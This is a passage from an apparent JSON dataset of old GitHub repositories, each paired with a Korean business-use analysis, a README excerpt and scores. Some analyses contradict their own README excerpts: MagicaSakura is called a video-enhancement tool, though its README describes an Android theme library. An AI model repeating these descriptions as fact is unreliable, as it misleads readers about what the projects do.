자율주행, 창고 재고관리 등 다양한 산업에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 기반 SaaS 서비스**\n건물 침입자 감지, 주차장 차량 추적 등을 자동으로 모니터링하는 클라우드 기반 ","readme_excerpt":"# Notice(2019.11.2)\nThis repo was built back two years ago when there were no pytorch detection implementation that can achieve reasonable performance. At this time, there are many better repos out there, for example:\n\n- [detectron2](https://github.com/facebookresearch/detectron2)(It's a masterpiece.)\n- [mmdetection](https://github.com/open-mmlab/mmdetection)\n\nTherefore, this repo will not be actively maintained.\n\n# Important notice:\nIf you used the master branch before Sep. 26 2017 and its corresponding pretrained model, **PLEASE PAY ATTENTION**:\nThe old master branch in now under old_master, you can still run the code and download the pretrained model, but the pretrained model for that old master is not compatible to the current master!\n\nThe main differences between new and old master branch are in this two commits: [9d4c24e](https://github.com/ruotianluo/pytorch-faster-rcnn/commit/9d4c24e83c3e4ec33751e50d5e4d8b1dd793dfaa), [c899ce7](https://github.com/ruotianluo/pytorch-faster-rcnn/","composite_score":0.5187,"license_safety_tag":"safe"},{"name":"ShizukuIchi/winXP","github_url":"https://github.com/ShizukuIchi/winXP","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":31,"description":"# winXP 저장소 분석\n\n## 왜 보물인가\nWindows XP 시스템을 현대적으로 재현하거나 향수를 불러일으키는 인터페이스를 만들 수 있는 도구로, 레트로 컴퓨팅 커뮤니티와 교육용 목적에서 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 복고풍 데스크톱 시뮬레이터를 웹 기반 서비스로 제공하여 향수를 느끼는 사용자들이 구독 요금을 지불","readme_excerpt":"# WinXP\n\n🏁 Web based Windows XP desktop recreation.\n\nFeatures:\n\n- Drag and resize, minimize, maximize windows\n- Open applications from desktop icons or start menu\n- Minesweeper, Internet Explorer, My Computer, Notepad, Winamp, Paint\n- Power off menu\n\n## [Try it!](https://winxp.now.sh)\n\nWindows XP 👉 https://winxp.now.sh\n\n[![](demo/demo.gif)](https://winxp.now.sh)\n\n## Contributing\n\nGenerally open an issue (or comment on an issue if there's one already) before starting work on a PR.\n\n## License\n\nThe Windows XP name, artwork, trademark are surely property of Microsoft. This project is provided for educational purposes only. It is not affiliated with and has not been approved by Microsoft.\n\n## Thanks\n- [Webamp](https://github.com/captbaritone/webamp), Winamp 2 reimplementation by: [captbaritone](https://github.com/captbaritone)\n- [JS Paint](https://github.com/1j01/jspaint), Paint reimplementation by: [1j01](https://github.com/1j01)","composite_score":0.5186,"license_safety_tag":"safe"},{"name":"luoye663/e5","github_url":"https://github.com/luoye663/e5","stars":10,"language":"Java","license":"Apache-2.0","abandonment_months":30,"description":"# luoye663/e5 저장소 분석\n\n## 왜 보물인가\n마이크로소프트 클라우드 서비스와 연동하는 자동화 도구로, 기업의 반복적인 업무를 사람 손을 거치지 않고 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 마이크로소프트 365를 쓰는 기업들을 위한 자동 데이터 동기화 서비스\n- **내부 업무 도구**: 대기업의 HR/재","readme_excerpt":"# E5续订程序\n此项目为该网址的源代码(后端) https://e5.qyi.io/\n(前端) https://github.com/luoye663/e5-html\n#### 使用教程\nhttps://qyi.io/archives/687.html\n\n#### 计划:\n- [ ] 基础数据使用轻量级的h2存储\n- [x] 日志使用 TDengine/influxdb 存储\n- [ ] 去除mysql依赖\n- \n### 2021-08-19\n1、取消启动清空redis  \n2、将调用日志放到influx，减轻mysql压力\n### 2021-07-28\n去除rabbitMQ依赖，使用线程池实现更简单(执行时间颗粒度降低)\n\n### 2020-12-20\n前端框架更改为Angular,同时支持多应用，每个账户最多支持5个应用。\n## 说明\n此项目为我的新手练手作，代码辣鸡，目前已经从2020年3月运行到至今。  \n如果要自己搭建的话得自己研究下了，不提供技术支持(懒)，记得修改配置文件 \nsrc/main/resources/application-online.properties \n```\nuser.admin.githubId  - 自己的github id  \n数据库配置  \nredis配置  \nRabbit配置  \ngithub.client_id  \ngithub.client_secret  \n(这两个在https://github.com/settings/developers 申请一个apps就行了。)\n```\n## 注意事项\n\n\n## 用到技术或框架\n### spring boot  \n\n### Redis\n默认用1库，可自行在配置文件修改  \n\n### Mysql\n自行导入sql  \n没有写清空日志功能，后面加上。  \n按道理说日志因该存到MongoDB里，所以？\n### Mybatis Plus\n\n### Spring Security\n权限配置由于就那么几个，所以就没写到mysql里面。\n### log4j2\n日志框架\n\n## Star History\n\n[![Star History Chart](https://api.star-history.com/svg?repos=luoye663/e5&type=Date)](https:/","composite_score":0.5186,"license_safety_tag":"safe"},{"name":"JordanKnott/taskcafe","github_url":"https://github.com/JordanKnott/taskcafe","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":35,"description":"# TaskCafe 저장소 분석\n\n## 왜 보물인가\n팀원들과 함께 일정을 정리하고 진행 상황을 한눈에 볼 수 있는 협업 도구를 직접 만들고 운영할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 팀 협업 플랫폼**\n- 월 구독료를 받고 기업들에게 클라우드 기반 업무 관리 서비스 제공\n\n**2. 내부 업무 도구: 회사 전용 시스템","readme_excerpt":"<p align=\"center\">\n <img width=\"450px\" src=\"./.github/taskcafe-full.png\" align=\"center\" alt=\"Taskcafe logo\" />\n</p>\n<p align=\"center\">\n  <a href=\"https://discord.gg/JkQDruh\">\n    <img alt=\"Discord\" src=\"https://img.shields.io/discord/745396499613220955\" />\n  </a>\n  <a href=\"https://github.com/JordanKnott/taskcafe/releases\">\n    <img alt=\"Releases\" src=\"https://img.shields.io/github/v/release/JordanKnott/taskcafe\" />\n  </a>\n  <a href=\"https://hub.docker.com/repository/docker/taskcafe/taskcafe\">\n    <img alt=\"Dockerhub\" src=\"https://img.shields.io/docker/v/taskcafe/taskcafe?label=docker&sort=semver\" />\n  </a>\n  <a href=\"https://goreportcard.com/report/github.com/JordanKnott/taskcafe\">\n    <img alt=\"Go Report Card\" src=\"https://goreportcard.com/badge/github.com/JordanKnott/taskcafe\" />\n  </a>\n  <a href=\"\">\n    <img alt=\"Docker pulls\" src=\"https://img.shields.io/docker/pulls/taskcafe/taskcafe\" />\n  </a>\n</p>\n\n  <p align=\"center\">\n    <a href=\"https://github.com/JordanKnott/taskcafe/issues/","composite_score":0.5186,"license_safety_tag":"safe"},{"name":"CryptoGnome/Limit-Sniper","github_url":"https://github.com/CryptoGnome/Limit-Sniper","stars":499,"language":"Python","license":"unknown","abandonment_months":54,"description":"# Limit-Sniper 상용화 분석\n\n## 왜 보물인가\n암호화폐 거래소에서 원하는 가격에 자동으로 주문을 실행해주는 기술로, 24시간 시장을 모니터링해야 하는 투자자들의 수작업을 완전히 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"자동 주문 설정 후 잊어버리세요\" - 웹사이트에서 목표 가격을 입력하면 도달 시 자동 매매","readme_excerpt":"# Limit Sniper\nA mempool sniping bot for Ethereum, Binance Smart Chain, Matic, &amp; Fantom that is able to scan for new liquidity adds on token launches, so as to be able to buy a token as soon as liquidity is added --> in the same block\n\n*This bot was built as a learning project for me to learn how to use Web.py, Erc20, & improve my coding skills please use at your own risk!*\n\n#### Grab the Latest Release:\nhttps://github.com/CryptoGnome/Limit-Sniper/releases\n\n## HOW TO INSTALL Sniper Bot\nThere are 3 ways to install Sniper Bot : \n\n&nbsp;\n\n\n### 1. Run The Python Code Locally [*this is most ideal and can work on any OS*]\nHere is a tutorial step-by-step: \n- [x] Download last Sniper Bot code on the \"Code\" page https://github.com/CryptoGnome/Limit-Sniper by clicking on Code > Download Zip: \n<img src=\"https://user-images.githubusercontent.com/70858574/145568534-e22c2887-d761-4fba-8dd0-f765b4300a6c.png\" width=\"300\">\n\n- [x] Unzip file\n- [x] Install Python on your computer : https://www.python","composite_score":0.5185,"license_safety_tag":"unknown"},{"name":"Bilibili/MagicaSakura","github_url":"https://github.com/Bilibili/MagicaSakura","stars":9,"language":"Java","license":"Apache-2.0","abandonment_months":52,"description":"# MagicaSakura 상용화 분석\n\n## 왜 보물인가\n비리빌리(중국 최대 동영상 플랫폼)가 만든 이 기술은 영상 품질을 자동으로 향상시켜 낡은 콘텐츠를 현대적으로 복구할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **영상 편집 SaaS**: 유튜버/크리에이터가 저화질 영상을 고화질로 변환하는 구독 서비스\n2. **방송국 내부 도구**: 보도자료실·","readme_excerpt":"![cover](https://raw.githubusercontent.com/xyczero/MagicaSakura/master/screenshot/magicasakura_cover.png)\n\n## MagicaSakura\n[ ![Download](https://api.bintray.com/packages/xyczero/maven/MagicaSakura/images/download.svg?version=0.1.9-beta3) ](https://bintray.com/xyczero/maven/MagicaSakura/0.1.9-beta3/link)\n\nMagicaSakura is an Android multi theme library which supporting both daily colorful theme and night theme.\n\n## Feature\n\n>1. Support both the daily colorful theme and the night theme.\n\n>2. Switch different theme without recreating activities.\n\n>3. Provide TintXXX Widgets for adapting multi theme to be more convenient and fast.\n\n>4. Just writie a drawable.xml or layout.xml can be automatically adapted to different theme styles.\n\n>5. Offer backward-compatible versions of the Android system that can be used with 4.0.3 or higher.\n\n>6. Support Vector Drawable with appcompat-v7.\n\n>7. Easy to integrate to your app.\n\n## Demo\n\n![ScreenShot.gif](https://github.com/xyczero/MagicaSakura/blob/master","composite_score":0.5185,"license_safety_tag":"safe"},{"name":"adrianhajdin/project_travel_advisor","github_url":"https://github.com/adrianhajdin/project_travel_advisor","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":32,"description":"# Travel Advisor 프로젝트 분석\n\n## 왜 보물인가\n여행지의 맛집, 호텔, 관광지 정보를 한눈에 찾아볼 수 있는 여행 계획 도우미로, 여행을 좋아하는 누구나 유용하게 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여행 계획 웹사이트로 월 구독료를 받고 프리미엄 기능(맞춤형 추천, 일정표 작성 등) 제공\n2. **내","readme_excerpt":"# Travel Advisor\n\n![Travel Advisor](https://i.ibb.co/qph2cZn/image.pngg)\n\n### [🌟 Become a top 1% Next.js 13 developer in only one course](https://jsmastery.pro/next13)\n### [🚀 Land your dream programming job in 6 months](https://jsmastery.pro/masterclass)\n\n## Introduction\nBuild and Deploy an advanced Travel Companion Application using Google Maps. With Geolocation, Google Maps API, Searching for places, Fetching restaurants, hotels and attractions based on location from specialized Rapid APIs, data filtering and much more, this Travel Advisor App is the best Maps Application that you can currently find on YouTube and on the entire internet.\n\nIn this video, you'll learn:\n\n- Advanced React Best Practices such as folder & file structure, hooks and refs\n- Creating a User Interface using Material UI\n- Working with Google Maps API\n- And most importantly fetching data from unlimited sources using RapidAPI\n- Essentially, you'll become the master of working with APIs\n\n[RapidAPI](https://rapidapi","composite_score":0.5184,"license_safety_tag":"safe"},{"name":"jeffharrell/minicart","github_url":"https://github.com/jeffharrell/minicart","stars":499,"language":"JavaScript","license":"MIT","abandonment_months":95,"description":"# minicart 상업화 분석\n\n## 왜 보물인가\n온라인 쇼핑몰에서 고객이 물품을 담는 장바구니 기능을 간단하고 빠르게 만들 수 있는 도구로, 중소 쇼핑몰 운영자들이 개발 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 쇼핑몰 빌더 플랫폼에 내장하여 소상공인들이 쉽게 온라인 스토어를 개설하도록 지원\n2. **내부","readme_excerpt":"# Minicart.js\n\n*As much as I love it, this project is no longer supported with me being short on time. I am open to Pull Requests and if anyone is interested in taking it on please let me know.*\n\n[![Build Status](https://travis-ci.org/jeffharrell/minicart.png?branch=master)](https://travis-ci.org/jeffharrell/minicart)\n\nThe minicart is a great way to improve your PayPal shopping cart integration. One simple change and your users will be able to manage their shopping cart directly from your website. Additional APIs provide you the power to customize the behavior to your needs.\n\n1. [Basic Setup](#basic-setup)\n2. [Advanced API](#advanced-api)\n3. [API Examples](#api-examples)\n4. [Customization](#customization)\n5. [Localization](#localization)\n6. [FAQ](#faq)\n\n\n\n## Basic Setup\n\n1. Create a PayPal [Add to Cart Button](https://www.paypal.com/cgi-bin/webscr?cmd=p/xcl/web-accept-to-sc-button-outside)\n2. Include the following snippet into your HTML before the closing &lt;/body&gt; tag:\n\n    ```htm","composite_score":0.5181,"license_safety_tag":"safe"},{"name":"tensorspace-team/tensorspace","github_url":"https://github.com/tensorspace-team/tensorspace","stars":11,"language":"JavaScript","license":"Apache-2.0","abandonment_months":42,"description":"# TensorSpace 상용화 분석\n\n## 왜 보물인가\n복잡한 AI 모델의 동작 원리를 시각적으로 보여주는 도구로, 기술자가 아닌 사람도 AI의 판단 과정을 이해할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 대학교와 온라인 강좌에서 AI 원리를 쉽게 설명하는 인터랙티브 학습 도구로 판매\n2. **기업용 내부 도구**","readme_excerpt":"<p align=\"center\">\n<img width=150 src=\"https://raw.githack.com/tensorspace-team/tensorspace/master/assets/logo.png\">\n</p>\n<h1 align=\"center\">TensorSpace.js</h1>\n<p align=\"center\"><b>Present Tensor in Space</b></p>\n\n<p align=\"center\">\n<strong>English</strong> | <a href=\"https://github.com/tensorspace-team/tensorspace/blob/master/README_zh.md\"><strong>中文</strong></a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/tensorspace\"><img src=\"https://img.shields.io/npm/v/tensorspace.svg\" alt=\"npm version\" height=\"18\"></a>\n  <a href=\"https://github.com/tensorspace-team/tensorspace/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-Apache--2.0-green.svg\" alt=\"license badge\"></a>\n  <a href=\"https://github.com/tensorflow/tfjs\"><img src=\"https://img.shields.io/badge/dependencies-tfjs-brightgreen.svg\" alt=\"dependencies badge\"></a>\n  <a href=\"https://github.com/mrdoob/three.js\"><img src=\"https://img.shields.io/badge/dependencies-three.js-brightgreen.svg\" alt=\"depend","composite_score":0.5181,"license_safety_tag":"safe"},{"name":"datproject/dat","github_url":"https://github.com/datproject/dat","stars":7,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":37,"description":"# Dat 프로젝트 분석\n\n## 왜 보물인가\n인터넷 연결 없이도 컴퓨터끼리 직접 파일을 주고받을 수 있는 기술로, 중앙 서버에 의존하지 않는 새로운 데이터 공유 방식을 제시합니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 대규모 설계도나 건축 파일을 여러 사무실 간에 빠르게 공유하는 협업 플랫폼\n- **SaaS 서비스**: 인터넷이 불안정한 ","readme_excerpt":"More info on active projects and modules at [dat-ecosystem.org](https://dat-ecosystem.org/) <img src=\"https://i.imgur.com/qZWlO1y.jpg\" width=\"30\" height=\"30\" /> \n\n---\n\n# Dat\n\n> npm install -g dat\n\nUse `dat` command line to share files with version control, back up data to servers, browse remote files on demand, and automate long-term data preservation.\n\n`dat` is the first application based upon the [Hypercore Protocol](https://github.com/hypercore-protocol), and drove the architectural design through iterative development between 2014 and 2017. There exists a large community around it. \n\n\n[<img src=\"https://datproject.github.io/design/downloads/dat-logo.png\" align=\"right\" width=\"140\">][Dat Project]\n\nHave questions? Join our chat via IRC or Gitter:\n\n[![#dat IRC channel on freenode][irc-badge]][irc-channel]\n[![datproject/discussions][gitter-badge]][gitter-chat]\n\n### Thanks to our financial supporters!\n![OpenCollective](https://opencollective.com/dat/tiers/maintainer.svg?avatarHeight=36&w","composite_score":0.518,"license_safety_tag":"safe"},{"name":"tanluren/yolov3-channel-and-layer-pruning","github_url":"https://github.com/tanluren/yolov3-channel-and-layer-pruning","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":70,"description":"# YOLOv3 채널·레이어 프루닝 기술 평가\n\n## 왜 보물인가\n카메라로 물체를 인식하는 AI 모델을 90% 이상 축소하면서도 정확도를 유지할 수 있어, 스마트폰이나 저사양 기기에서도 빠르게 작동하는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업용 영상 감시 시스템 → 서버 비용 대폭 절감\n2. **내부 업무 도구**:","readme_excerpt":"# yolov3-channel-and-layer-pruning\n本项目以[ultralytics/yolov3](https://github.com/ultralytics/yolov3)为基础实现，根据论文[Learning Efficient Convolutional Networks Through Network Slimming (ICCV 2017)](http://openaccess.thecvf.com/content_iccv_2017/html/Liu_Learning_Efficient_Convolutional_ICCV_2017_paper.html)原理基于bn层Gmma系数进行通道剪枝，下面引用了几种不同的通道剪枝策略，并对原策略进行了改进，提高了剪枝率和精度；在这些工作基础上，又衍生出了层剪枝，本身通道剪枝已经大大减小了模型参数和计算量，降低了模型对资源的占用，而层剪枝可以进一步减小了计算量，并大大提高了模型推理速度；通过层剪枝和通道剪枝结合，可以压缩模型的深度和宽度，某种意义上实现了针对不同数据集的小模型搜索。<br>\n<br>\n项目的基本工作流程是，使用yolov3训练自己数据集，达到理想精度后进行稀疏训练，稀疏训练是重中之重，对需要剪枝的层对应的bn gamma系数进行大幅压缩，理想的压缩情况如下图，然后就可以对不重要的通道或者层进行剪枝，剪枝后可以对模型进行微调恢复精度，后续会写篇博客记录一些实验过程及调参经验，在此感谢[行云大佬](https://github.com/zbyuan)的讨论和合作！<br>\n<br>\n![稀疏](https://github.com/tanluren/yolov3-channel-and-layer-pruning/blob/master/data/img/1.jpg)\n\n<br>\n\n####  更新\n1.增加了对**yolov3-spp**结构的支持，基础训练可以直接使用yolov3-spp.weights初始化权重，各个层剪枝及通道剪枝脚本的使用也和yolov3一致。<br>\n2.增加了多尺度推理支持，train.py和各剪枝脚本都可以指定命令行参数, 如 --img_size 608 .<br>\n3.2019/12/06更改了层剪枝的选层策略，由最大值排序改为均值排序。<b","composite_score":0.5178,"license_safety_tag":"safe"},{"name":"DeqianBai/Hands-on-Machine-Learning","github_url":"https://github.com/DeqianBai/Hands-on-Machine-Learning","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":44,"description":"# DeqianBai/Hands-on-Machine-Learning 분석\n\n## 왜 보물인가\n머신러닝(컴퓨터가 스스로 학습하는 기술)을 직접 실습하며 배울 수 있는 완전한 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 머신러닝 초급자 대상 유료 강좌로 제공 (Udemy, Coursera 등)\n2. **기업 직원 교육 ","readme_excerpt":"# Hands-on-Machine-Learning\n\n\n### 目的\n\n这份笔记旨在帮助中文学习者以一种**较快较系统的方式入门机器学习**，\n\n是在学习[Hands-on Machine Learning with Scikit-Learn and TensorFlow](http://shop.oreilly.com/product/0636920052289.do)这本书的\n时候做的个人笔记:\n\n[![book](http://akamaicovers.oreilly.com/images/0636920052289/cat.gif)](http://shop.oreilly.com/product/0636920052289.do)\n\n### 此项目的可取之处\n- 原书的代码示例部分**只有代码没有文字注释**，纸质书上有文字解释但不利于操作，这个项目将其合二为一，\n学习者这只需要打开Jupyter notebook即可，无需频繁翻阅纸质书籍或查看PDF文档\n- 形式和吴大大Deep learning.ai课程作业的形式一样，**一段文字解释，一段代码操作**，方便快速理解原理并进行实践操作\n- 中文注释，方便中文学习者较快较系统的入门机器学习\n\n### 说明\n\n- 全书分为 Part I 机器学习(8 章) 和 Part II 深度学习(8 章) 两大部分，Part II 最后一章是强化学习\n- 绪论部分和第一章大家直接看原书就好了，这个项目的代码示例是从第二章开始的\n- 此项目适用于**英语不是那么好，而且时间又不怎么充裕，又想要快速入门机器学习的读者**，大神就不要在这里耽误时间，\n当然你如果想要完善一下自己的知识体系，缕清一些概念之间的关系，这本书还是很不错的选择\n\n### 建议\n- **关于时间**，这本书是一位美国数据科学家向我推荐的，他从头到尾做完了整本书的所有示例代码，大概用了80个小时左右，以此作为参考，大家自行安排自己的进度\n- **关于习题**，每一章后面都提供了相应的练习题，既有简述类的问答题，也有任务型的代码操作题，附录里面都有参考答案，建议有时间的都学习一下，对于掌握知识，应对面试，很有帮助。简述型的课后习题都以章节为单位翻译成中文放在[我的简书](https://www.jianshu.com/u/8f6436eabaac)","composite_score":0.5178,"license_safety_tag":"safe"},{"name":"tools/godep","github_url":"https://github.com/tools/godep","stars":6,"language":"Go","license":"BSD-3-Clause","abandonment_months":99,"description":"# tools/godep 분석 보고서\n\n## 왜 보물인가\n6년이 지난 오래된 프로젝트지만, 소프트웨어 개발 시 필요한 라이브러리 버전 관리를 자동화하는 도구로서 여전히 개발자들이 참고할 수 있는 기술 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 대상 의존성 관리 플랫폼 구축 (여러 프로젝트의 라이브러리 버전을 중앙에서 관리)","readme_excerpt":"# Godep - Archived\n\nPlease use [dep](https://github.com/golang/dep) or another tool instead.\n\nThe rest of this readme is preserved for those that may still need its contents.\n\n[![Build Status](https://travis-ci.org/tools/godep.svg)](https://travis-ci.org/tools/godep)\n\n[![GoDoc](https://godoc.org/github.com/tools/godep?status.svg)](https://godoc.org/github.com/tools/godep)\n\ngodep helps build packages reproducibly by fixing their dependencies.\n\nThis tool assumes you are working in a standard Go workspace, as described [here](http://golang.org/doc/code.html). We\nexpect godep to build on Go 1.4* or newer, but you can use it on any project that works with Go 1 or newer.\n\nPlease check the [FAQ](FAQ.md) if you have a question.\n\n## Golang Dep\n\nThe Go community now has the [dep](https://github.com/golang/dep) project to\nmanage dependencies. Please consider trying to migrate from Godep to dep. If there\nis an issue preventing you from migrating please file an issue with dep so the\nproblem can be ","composite_score":0.5178,"license_safety_tag":"safe"},{"name":"xfangfang/Macast","github_url":"https://github.com/xfangfang/Macast","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":41,"description":"# Macast 사업화 분석\n\n## 왜 보물인가\n집에 있는 스마트 기기들(TV, 스피커 등)로 쉽게 영상과 음악을 보내 재생할 수 있는 기술로, 번거로운 케이블 연결 없이 무선으로 미디어를 공유할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 스마트홈 통합 플랫폼**\n가정용 IoT 기기를 한 앱으로 관리하는 서비스에 내장하여 사용자가","readme_excerpt":"<img align=\"center\" src=\"macast_slogan.png\" alt=\"slogan\" height=\"auto\"/>\n\n# Macast\n\n[![visitor](https://visitor-badge.glitch.me/badge?page_id=xfangfang.Macast)](https://github.com/xfangfang/Macast/releases/latest)\n![stars](https://img.shields.io/badge/dynamic/json?label=github%20stars&query=stargazers_count&url=https%3A%2F%2Fapi.github.com%2Frepos%2Fxfangfang%2FMacast)\n[![downloads](https://img.shields.io/github/downloads/xfangfang/Macast/total?color=blue)](https://github.com/xfangfang/Macast/releases/latest)\n[![plugins](https://shields-staging.herokuapp.com/github/directory-file-count/xfangfang/Macast-plugins?type=dir&label=plugins)](https://github.com/xfangfang/Macast-plugins)\n[![pypi](https://img.shields.io/pypi/v/macast)](https://pypi.org/project/macast/)\n[![aur](https://img.shields.io/aur/version/macast-git?color=yellowgreen)](https://aur.archlinux.org/packages/macast-git/)\n[![build](https://img.shields.io/github/workflow/status/xfangfang/Macast/Build%20Macast)](https://github.com","composite_score":0.5177,"license_safety_tag":"restricted"},{"name":"vivekn/sentiment","github_url":"https://github.com/vivekn/sentiment","stars":498,"language":"Python","license":"BSD-2-Clause","abandonment_months":69,"description":"# vivekn/sentiment 분석 리포트\n\n## 왜 보물인가\n텍스트에서 긍정/부정 감정을 자동으로 인식하는 기술로, 고객 피드백이나 소셜 미디어 반응을 빠르게 분석할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 리뷰를 자동으로 분석하는 평판 관리 플랫폼 (예: 이커머스 상품 후기 감정 분석)\n2. **내부 업무 도구**","readme_excerpt":"sentiment\n=========\n\nSentiment analysis using machine learning techniques.\n\nCheck info.py for the training and testing code. A demo of the\ntool is available [here](http://sentiment.vivekn.com)\n\nRefer this paper for more information about the algorithms used.\n\nhttp://arxiv.org/abs/1305.6143\n","composite_score":0.5176,"license_safety_tag":"safe"},{"name":"nbedos/termtosvg","github_url":"https://github.com/nbedos/termtosvg","stars":6,"language":"Python","license":"BSD-3-Clause","abandonment_months":72,"description":"# termtosvg 저장소 분석\n\n## 왜 보물인가\n터미널 화면 기록을 애니메이션 영상으로 자동 변환해주는 도구로, 기술 튜토리얼이나 소프트웨어 시연에 필요한 전문적인 영상을 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 교육 플랫폼에서 코딩 강좌 영상을 자동 생성하여 제공\n2. **내부 업무 도구**: 기술 ","readme_excerpt":"**Note: As of June 2020 I do not have time to maintain termtosvg anymore and this repository is now read-only.**\n\n# termtosvg\ntermtosvg is a Unix terminal recorder written in Python that renders your command\nline sessions as standalone SVG animations.\n\n![Example](./docs/examples/awesome_window_frame_powershell.svg)\n\n* [Gallery of examples](https://nbedos.github.io/termtosvg/pages/examples.html)\n* [Gallery of templates](https://nbedos.github.io/termtosvg/pages/templates.html)\n\n## Features\n* Produce lightweight and clean looking animations or still frames embeddable on a project page\n* Custom color themes, terminal UI and animation controls via user-defined [SVG templates](man/termtosvg-templates.md)\n* Rendering of recordings in asciicast format made with asciinema\n    \n## Installation\ntermtosvg is compatible with Linux, macOS and BSD OSes, requires Python >= 3.5 and can be installed as follows using pip:\n```shell\n# Create virtualenv named '.venv'\npython3 -m venv .venv\n# Activate virtual","composite_score":0.5176,"license_safety_tag":"safe"},{"name":"Blankj/resume","github_url":"https://github.com/Blankj/resume","stars":500,"language":"CSS","license":"unknown","abandonment_months":66,"description":"# Blankj/resume 상용화 분석\n\n## 왜 보물인가\n이력서 작성과 관리를 자동화하고 표준화할 수 있는 재사용 가능한 템플릿 모음으로, 구직자와 기업 모두의 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n구직 플랫폼이 이 템플릿을 기반으로 \"5분 안에 이력서 만들기\" 같은 자동화 서비스를 제공할 수 있습","readme_excerpt":"# 简历\n\n`Markdown`格式的简历最适合不过我们技术人员了，再加上强大的格式转换工具： **[Pandoc](https://pandoc.org)**，我们只需要一份`Markdown`格式的简历便可轻轻松松管理所有格式的简历了，比如下方的`HTML`格式的简历，就是来源于此，如果觉得我这份模板样子不错，小伙伴们可以fork此项目后自己修改其个人信息，在安装 [Pandoc](https://pandoc.org) 的前提下执行目录中的`to_html.sh`脚本即可(记得修改脚本中`-T`后面html显示的title内容)。\n\n我的简历参考自[Stephen Tudor](https://github.com/smt/resume)，其`Markdown`和`HTML`的中英文版如下所示，希望能帮助到大家。\n\n* [我的中文简历-Markdown](https://github.com/Blankj/resume/blob/master/resume-cn.md)\n* [我的中文简历-HTML](https://blankj.com/resume/resume-cn.html)\n\n* [我的英文简历-Markdown](https://github.com/Blankj/resume/blob/master/resume-eng.md)\n* [我的英文简历-HTML](https://blankj.com/resume/resume-eng.html)\n\n\n## 怎样才是一份好的技术简历（参考：[ResumeSample](https://github.com/geekcompany/ResumeSample)）\n\n一份好的简历不光说明事实，更通过 FAB 模式来增强其说服力。\n\n* Feature：是什么\n* Advantage：比别人好在哪些地方\n* Benefit：如果雇佣你，招聘方会得到什么好处\n\n写简历和写议论文不同，过分的论证会显得自夸，反而容易引起反感，所以要点到为止。这里的技巧是，提供论据，把论点留给阅读简历的人自己去得出。放论据要具体，最基本的是要数字化，好的论据要让人印象深刻。\n\n举个例子（下边内容是虚构的）：\n\n> 2006 年，参与了手机XX网发布系统 WAPCMS 的开发（F，是什么，这部分是大家都会写的）。\n> \n> 作为核心","composite_score":0.5176,"license_safety_tag":"unknown"},{"name":"liweiwei1419/LeetCode-Solutions-in-Good-Style","github_url":"https://github.com/liweiwei1419/LeetCode-Solutions-in-Good-Style","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":53,"description":"# LeetCode-Solutions-in-Good-Style 분석\n\n## 왜 보물인가\n프로그래밍 면접 준비를 위해 복잡한 문제들을 단계별로 쉽게 풀어낸 교육 자료로, 취업준비생과 개발자들이 실무 필요 능력을 갖추는 데 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 기업 채용 면접 대비 강좌를 구독 서비스로 제공\n2. *","readme_excerpt":"# LeetCode-Solutions-in-Good-Style\n\n[![GitHub issues](https://img.shields.io/github/issues/liweiwei1419/LeetCode-Solutions-in-Good-Style)](https://github.com/liweiwei1419/LeetCode-Solutions-in-Good-Style/issues) [![GitHub forks](https://img.shields.io/github/forks/liweiwei1419/LeetCode-Solutions-in-Good-Style)](https://github.com/liweiwei1419/LeetCode-Solutions-in-Good-Style/network) [![GitHub stars](https://img.shields.io/github/stars/liweiwei1419/LeetCode-Solutions-in-Good-Style)](https://github.com/liweiwei1419/LeetCode-Solutions-in-Good-Style/stargazers) [![GitHub license](https://img.shields.io/github/license/liweiwei1419/LeetCode-Solutions-in-Good-Style)](https://github.com/liweiwei1419/LeetCode-Solutions-in-Good-Style/blob/master/LICENSE)\n\n\n> **说明**：我和绝大多数同学一样，一边学习、一边总结。我会争取做更多的分享，给大家带来一些有用的知识，感谢大家一直以来的支持。\n\n大家好，这里是一个《算法与数据结构》的入门级教程，适用于算法零基础和转行同学，不适合于准备算法竞赛。想传递的观点是：**写逻辑清楚的代码**，所以我写的代码一定经过了严格的思考，格式非常标准，不带有个人风格，不会为了缩减代码行数而少写一个空行和注释。在这里：\n\n+ 特别感谢 [@AbbyDeng](https://github.com/AbbyD","composite_score":0.5176,"license_safety_tag":"safe"},{"name":"thunlp/PLMpapers","github_url":"https://github.com/thunlp/PLMpapers","stars":6,"language":"","license":"MIT","abandonment_months":43,"description":"# PLMpapers 저장소 분석\n\n## 왜 보물인가\n최신 인공지능 논문들을 체계적으로 모아놓은 학습 자료실로, AI 